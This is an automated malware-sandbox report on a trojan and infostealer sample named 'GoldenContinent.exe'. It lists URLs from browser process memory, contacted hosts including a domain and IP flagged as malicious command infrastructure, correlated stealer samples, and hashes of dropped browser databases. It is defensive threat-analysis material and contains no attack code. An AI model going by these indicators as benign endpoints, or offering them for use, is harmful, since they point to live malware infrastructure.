                                                                                                                                                                          https://chrome.google.com/webstoreLDDiscoverchrome.exe, 0000000F.00000003.2172623378.0000781002EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2178761795.0000781002EF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2173217320.0000781002EF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2173175607.0000781003144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177639604.000078100254C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177663174.0000781002EDC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://anglebug.com/4836chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://issuetracker.google.com/issues/166475273chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://docs.google.com/presentation/:chrome.exe, 0000000F.00000003.2163554113.00007810028B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://anglebug.com/4384chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://mail.google.com/mail/?tab=rm&amp;ogblchrome.exe, 0000000F.00000003.2210093169.000078100520C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2209710818.00007810051A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2211953762.0000781003E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210058488.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://anglebug.com/3970chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://apis.google.comchrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210009540.0000781003564000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://support.mozilla.org/products/firefoxgro.allRelationship.com, 0000000A.00000002.2605188025.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://polymer.github.io/CONTRIBUTORS.txtchrome.exe, 0000000F.00000003.2178034495.000078100340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176878407.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177743116.00007810032D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176707193.0000781002EDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175638995.000078100325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175408842.0000781003240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175279363.0000781003168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175441776.0000781003290000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177474988.00007810025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2177249935.00007810031B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2175468012.000078100310C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176808055.0000781002C38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://labs.google.com/search?source=ntpchrome.exe, 0000000F.00000003.2210093169.000078100520C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2209710818.00007810051A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2211953762.0000781003E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210058488.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://google-ohttp-relay-query.fastly-edge.com/2Pchrome.exe, 0000000F.00000003.2204638989.000073A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2159791337.000073A0003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://anglebug.com/7604chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://anglebug.com/7761chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://ogs.google.com/widget/app/so?eom=1chrome.exe, 0000000F.00000003.2209581318.00007810051D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2210009540.0000781003564000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://anglebug.com/7760chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgRelationship.com, 0000000A.00000002.2593745021.0000000001960000.00000004.00000020.00020000.00000000.sdmp, EC2N7Y.10.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoRelationship.com, 0000000A.00000002.2593745021.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, 68QI5P.10.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                http://anglebug.com/5901chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://anglebug.com/3965chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    http://anglebug.com/6439chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      http://anglebug.com/7406chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://www.google.com/searchchrome.exe, 0000000F.00000003.2203435970.0000781004A0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://anglebug.com/7161chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://drive-autopush.corp.google.com/chrome.exe, 0000000F.00000003.2163008876.0000781002690000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://www.google.com/search?q=$chrome.exe, 0000000F.00000003.2177474988.00007810025A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                239.255.255.250
                                                                                                                                                                                                                                unknownReserved
                                                                                                                                                                                                                                unknownunknownfalse
                                                                                                                                                                                                                                142.250.181.68
                                                                                                                                                                                                                                www.google.comUnited States
                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                94.130.188.57
                                                                                                                                                                                                                                toptek.sbsGermany
                                                                                                                                                                                                                                24940HETZNER-ASDEtrue
                                                                                                                                                                                                                                149.154.167.99
                                                                                                                                                                                                                                t.meUnited Kingdom
                                                                                                                                                                                                                                62041TELEGRAMRUfalse
                                                                                                                                                                                                                                IP
                                                                                                                                                                                                                                192.168.2.4
                                                                                                                                                                                                                                127.0.0.1
                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                Analysis ID:1579534
                                                                                                                                                                                                                                Start date and time:2024-12-22 22:46:05 +01:00
                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                Overall analysis duration:0h 6m 55s
                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                Number of analysed new started processes analysed:22
                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                Sample name:GoldenContinent.exe
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@43/39@5/6
                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                • Number of executed functions: 81
                                                                                                                                                                                                                                • Number of non-executed functions: 294
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 217.20.58.100, 192.229.221.95, 172.217.21.35, 64.233.161.84, 172.217.19.238, 172.217.17.46, 20.109.210.53, 23.218.208.109, 13.107.246.63
                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                16:46:56API Interceptor1x Sleep call for process: GoldenContinent.exe modified
                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                239.255.255.250FnTSHWLNWB.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                  NOTIFICATION_OF_DEPENDANTS_1.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      https://cpanel05wh.bkk1.cloud.z.com/~cp197720/open/DD/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                          7394231845.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                94.130.188.57file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                      149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • telegram.org/img/favicon.ico
                                                                                                                                                                                                                                                      http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • telegram.org/
                                                                                                                                                                                                                                                      http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                                                                      http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • telegram.org/
                                                                                                                                                                                                                                                      http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • telegram.org/
                                                                                                                                                                                                                                                      http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • telegram.org/?setln=pl
                                                                                                                                                                                                                                                      http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • telegram.org/
                                                                                                                                                                                                                                                      http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • telegram.dog/
                                                                                                                                                                                                                                                      LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                                      • t.me/cinoshibot
                                                                                                                                                                                                                                                      jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                                      • t.me/cinoshibot
                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      toptek.sbsfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 94.130.188.57
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                      • 94.130.188.57
                                                                                                                                                                                                                                                      t.mefile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      https://l.facebook.com/l.php?u=https%3A%2F%2Ft.me%2FPAWSOG_bot%2FPAWS%3Fstartapp%3Dy6XarDUx%26fbclid%3DIwZXh0bgNhZW0CMTAAAR3IsDSVMcBgD-KKIyBXkOWfUkEFRcacr_vOCRRmviPmkFBUb89K461Xors_aem_phLdcKrpf4KWQzIltAO6sg&h=AT0WVJB1xqSKqrvz6oCyiCr2S_kisddMHHYmkei4Ws2sbL4pRphOmNE4PXT0dksI9PktkcW4m87_ll8cIS3t1M10038szd68S2XeJYojq6dQAb2PNvHsZFU9AcnVKku-Ww&__tn__=R%5D-R&c%5B0%5D=AT333mRdaoK-Yj4Ygf4lXueSR8jJ8CACMU4jPPhyx4Dd8BU65ez-7IWN-rjEtxmQ4vnelW50DVCFSTPJgFIJWEEx8TitUX4wIVY-t-NciHl77nL94VWL9IfsUrTxvCQB2zyPBhLoYnhspB5Xwyppb4fz5drOP91P-bJPoqSIEG9eoaQFOXaOYJeNVBj8A6jTCbgB-MXs3Mr2iqYLeO7DnF-q9v0FShLlwJK2Dtzfkv1OxBm45LKEAXAPoI199zlXmZpVMznjGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      TELEGRAMRUfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      user.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      8v1GZ8v1LF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      HX Design.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                                                                                                      HETZNER-ASDEhttps://cpanel05wh.bkk1.cloud.z.com/~cp197720/open/DD/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                      • 135.181.58.223
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 94.130.188.57
                                                                                                                                                                                                                                                      https://gogvo.com/redir.php?url=https://atratejarat.com/wp-content/red/DhmgvVGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 136.243.5.53
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 94.130.188.57
                                                                                                                                                                                                                                                      nshsh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                      • 95.217.252.201
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                      • 94.130.188.57
                                                                                                                                                                                                                                                      powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                      • 188.40.81.35
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                      • 116.203.12.114
                                                                                                                                                                                                                                                      sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                      • 49.12.109.196
                                                                                                                                                                                                                                                      nshkarm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                      • 116.203.241.4
                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                      • 94.130.188.57
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 94.130.188.57
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      LightSpoofer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 94.130.188.57
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                      • 94.130.188.57
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      Rechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 94.130.188.57
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      Company Information.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 94.130.188.57
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 94.130.188.57
                                                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\523266\Relationship.comfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                        Full-Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                              Full-Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, XWormBrowse
                                                                                                                                                                                                                                                                        Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):294912
                                                                                                                                                                                                                                                                          Entropy (8bit):0.08436842005578409
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                                                                                                                                                                                                                                                          MD5:2CD2840E30F477F23438B7C9D031FC08
                                                                                                                                                                                                                                                                          SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                                                                                                                                                                                                                                                          SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
                                                                                                                                                                                                                                                                          SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
